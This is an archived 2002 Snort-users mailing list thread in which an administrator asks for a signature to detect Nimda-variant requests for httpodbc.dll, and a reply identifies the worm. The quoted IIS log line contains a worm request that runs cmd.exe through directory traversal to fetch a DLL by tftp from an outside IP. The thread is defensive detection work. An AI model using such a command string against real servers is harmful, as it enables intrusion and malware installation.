RE: Httpodbc.dll

["Hicks, John" <JHicks () JUSTICE GC CA>]

This usually fits in with the CMD.exe Access attempts of most web-worms, but
this specific one, AFAIK is Nimbda.E.

HTH,
John Hicks

-----Original Message-----
From: Robert Reid [mailto:rreid () 1800FLOWERS com]
Sent: Monday, December 23, 2002 1:07 PM
To: 'snort-users () lists sourceforge net'
Subject: [Snort-users] Httpodbc.dll
Importance: High


Morning,

I have been seeing a lot of requests for "httpodbc.dll" in my IIS server
logs. From what I can gather it's a nimda varient that uses the file name
httpodbc.dll for the trojan/listener it drops. Im not concerned with the
attack itself, but my snort boxes are not picking it up. Here is a snippet
from my logs:

2002-12-22 04:32:16 63.147.xxx.xxx - 192.168.xxx.xxx 80 GET
/publish_notfound.asp
404;http://www/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.147.160.27%20GET%2
0cool.dll%20c:\httpodbc.dll 200 0 0 137 47 HTTP/1.0 - - -

Does a snort signature exist for this type of attack?

Thanks a million,

Robert



-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users


-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users